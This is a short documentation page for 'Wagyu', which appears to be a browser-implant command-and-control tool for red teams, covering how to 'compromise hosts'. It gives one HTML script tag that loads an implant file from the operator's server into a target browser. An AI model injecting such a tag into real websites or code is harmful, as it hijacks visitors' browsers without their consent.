🥩
Wagyu Documentation
  • Wagyu
  • Installation
    • Wagyu Server
    • Wagyu Client
    • Connecting
  • Users
    • Creating Users
    • Modifying Existing Users
    • Delete Existing Users
    • Changing User Passwords
  • Implants
    • Creating Implants
    • Deleting Existing Implants
  • Payloads
    • Payload Functions
    • Creating Payloads
    • Initial Payloads
    • Modifying Existing Payloads
    • Deleting Existing Payloads
  • Hosts
    • Compromising Hosts
    • Executing Payloads
  • Findings
Powered by GitBook
On this page
  1. Hosts

Compromising Hosts

PreviousHostsNextExecuting Payloads

Last updated 2 years ago

To compromise a host, you must execute the implant on the target browser.

This can be done easily using the following HTML tag to include the implant script:

<script src="http://<server_address>:<port>/<implant_id>.js"></script>

See an example in the file within the repo.

test.html